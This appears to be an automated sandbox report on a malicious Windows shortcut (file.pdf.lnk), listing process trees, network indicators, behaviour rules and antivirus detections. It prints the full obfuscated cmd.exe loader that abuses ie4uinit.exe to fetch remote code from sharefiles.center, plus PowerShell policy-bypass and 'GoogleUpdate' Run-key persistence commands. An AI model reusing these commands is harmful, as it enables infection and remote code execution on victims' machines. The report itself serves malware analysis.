Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 21, 2024, 2:24 p.m. | Aug. 21, 2024, 2:26 p.m. |
Process | PID | Command line |
---|---|---|
cmd.exe | 3016 | "C:\Windows\System32\cmd.exe" /c start /wait "MLAvHukP" C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
cmd.exe | 1784 | "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!"" |
WMIC.exe | 2320 | wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings" |
explorer.exe | 1236 | C:\Windows\Explorer.EXE |
wscript.exe | 1720 | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC |
cmd.exe | 2688 | "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
wscript.exe | 2984 | wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmd.exe | 1780 | "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
powershell.exe | 2352 | powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
wscript.exe | 1968 | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmd.exe | 2792 | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
reg.exe | 3032 | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
ie4uinit.exe | 2544 | C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -ClearIconCache |
Name | Response | Post-Analysis Lookup |
---|---|---|
sharefiles.center | 104.21.92.14 | |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49170 -> 172.67.184.129:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49170 172.67.184.129:443 | C=US, O=Google Trust Services, CN=WE1 | CN=sharefiles.center | e2:b2:31:0e:2e:bc:db:7e:f3:a3:be:d5:95:0a:42:25:d4:79:01:4e |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | c:\program files (x86)\Google\Chrome\application\chrome.exe |
file | c:\program files\mozilla firefox\firefox.exe |
request | GET https://sharefiles.center/TEST22-PC |
file | C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 |
file | C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs |
file | C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
cmdline | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmdline | cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings" |
cmdline | powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
cmdline | "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmdline | cmd /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
cmdline | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmdline | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC |
cmdline | cmd /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
cmdline | "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!"" |
cmdline | wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmdline | wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | Checks if being debugged | rule | anti_dbg |
description | Bypass DEP | rule | disable_dep |
description | Create a windows service | rule | Create_Service |
description | Communications over RAW Socket | rule | Network_TCP_Socket |
description | Communication using DGA | rule | Network_DGA |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | Take ScreenShot | rule | ScreenShot |
description | Escalate priviledges | rule | Escalate_priviledges |
description | Steal credential | rule | local_credential_Steal |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Record Audio | rule | Sniff_Audio |
description | Communications over HTTP | rule | Network_HTTP |
description | Communications use DNS | rule | Network_DNS |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerCheck__RemoteAPI |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__ConsoleCtrl |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | (no description) | rule | Check_Dlls |
description | Checks if being debugged | rule | anti_dbg |
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert |
description | Bypass DEP | rule | disable_dep |
description | Affect hook table | rule | win_hook |
description | File Downloader | rule | Network_Downloader |
description | Match Windows Inet API call | rule | Str_Win32_Internet_API |
description | Communications over FTP | rule | Network_FTP |
description | Run a KeyLogger | rule | KeyLogger |
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
cmdline | wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings" |
cmdline | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
cmdline | "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!"" |
cmdline | wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate | reg_value | wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
file | C:\Users\test22\AppData\Local\Temp\file.pdf.lnk |
VIPRE | Heur.BZC.YAX.Pantera.9.F038540C |
Arcabit | Heur.BZC.YAX.Pantera.9.F038540C |
ESET-NOD32 | LNK/Agent.XL |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Pantera.9.F038540C |
MicroWorld-eScan | Heur.BZC.YAX.Pantera.9.F038540C |
Emsisoft | Heur.BZC.YAX.Pantera.9.F038540C (B) |
DrWeb | Trojan.MulDrop28.7944 |
FireEye | Heur.BZC.YAX.Pantera.9.F038540C |
Sophos | Troj/LnkObf-H |
Detected | |
MAX | malware (ai score=87) |
Kingsoft | Win32.Troj.Unknown.a |
Microsoft | Trojan:Win32/Pantera.A!MTB |
ZoneAlarm | HEUR:Trojan.WinLNK.Agent.gen |
GData | Heur.BZC.YAX.Pantera.9.F038540C |
VBA32 | Trojan.Link.ShellCmd |
Tencent | Win32.Trojan.Agent.Hdhl |
cmd | "c:\windows\system32\cmd.exe" /c powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pc |
cmd | reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /f |
cmd | wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc |
cmd | cmd /c reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /f |
cmd | "c:\windows\system32\cmd.exe" /c reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /f |
cmd | wmic process call create "c:\users\test22\appdata\local\temp\ie4uinit.exe -basesettings" |
cmd | powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pc |
cmd | c:\users\test22\appdata\local\temp\file.pdf.lnk |
cmd | "c:\windows\system32\cmd.exe" /c wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc |
cmd | cmd /c wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc |
cmd | "c:\windows\system32\wscript.exe" "c:\users\test22\appdata\roaming\adobe\run_all.vbs" reg add 'hkey_current_user\software\microsoft\windows\currentversion\run' /v googleupdate /t reg_sz /d 'wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc' /f |
cmd | "c:\windows\system32\wscript.exe" "c:\users\test22\appdata\roaming\adobe\run_all.vbs" wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc |
cmd | cmd /c powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pc |
cmd | c:\users\test22\appdata\local\temp\ie4uinit.exe -cleariconcache |
cmd | "c:\windows\system32\cmd.exe" /v /c "set "u1=teslacar"&&call set "p2=!u1:~2,1!!u1:~1,1!!u1:~0,1!"&&call !p2! "h3=!u1:~5,1!!u1:~4,1!!u1:~3,1!!u1:~3,1!"&&!h3! !p2! "e4=["&&!h3! !p2! "n5=v"&&!h3! !p2! "d6=e"&&!h3! !p2! "h7=i"&&!h3! !p2! "r8=]"&&!h3! !p2! "i9=g"&&!h3! !p2! "y10=n"&&!h3! !p2! "h11=t"&&!h3! !p2! "f12=u"&&!h3! !p2! "f13=="&&!h3! !p2! "a14=o"&&!h3! !p2! "d15=w"&&!h3! !p2! "n16=s"&&!h3! !p2! "p17=d"&&!h3! !p2! "u18=a"&&!h3! !p2! "l19=e"&&!h3! !p2! "k20=0"&&!h3! !p2! "q21=f"&&!h3! !p2! "x22=a"&&!h3! !p2! "h23=l"&&!h3! !p2! "s24=."&&!h3! !p2! "u25=r"&&!h3! !p2! "o26=r"&&!h3! !p2! "y27=o"&&!h3! !p2! "n28=5"&&!h3! !p2! "b29=f"&&!h3! !p2! "d30=7"&&!h3! !p2! "h31=c"&&!h3! !p2! "f32=h"&&!h3! !p2! "r33=p"&&!h3! !p2! "h34=4"&&!h3! !p2! "q35=%"&&!h3! !p2! "v36=m"&&!h3! !p2! "c37=l"&&!h3! !p2! "i38=x"&&!h3! !p2! "a39=s"&&!h3! !p2! "n40=2"&&!h3! !p2! "x41=\"&&!h3! !p2! "x42=-"&@echo off & (for %t in ("!e4!!n5!!d6!rs!h7!on!r8!" "si!i9!!y10!a!h11!!f12!r!d6! !f13! $w!h7!!y10!d!a14!!d15!!n16! !y10!!h11!$" "!e4!d!d6!s!h11!i!y10!a!h11!i!a14!!y10!!p17!irs!r8!" "!u18!45!l19!=!k20!1" "!e4!!p17!e!q21!!x22!u!h23!t!h7!ns!h11!al!h23!!s24!w!h7!!y10!dow!n16!7!r8!" "un!u25!!d6!!i9!ist!d6!!o26!!y27!cx!n16!=f07fd" 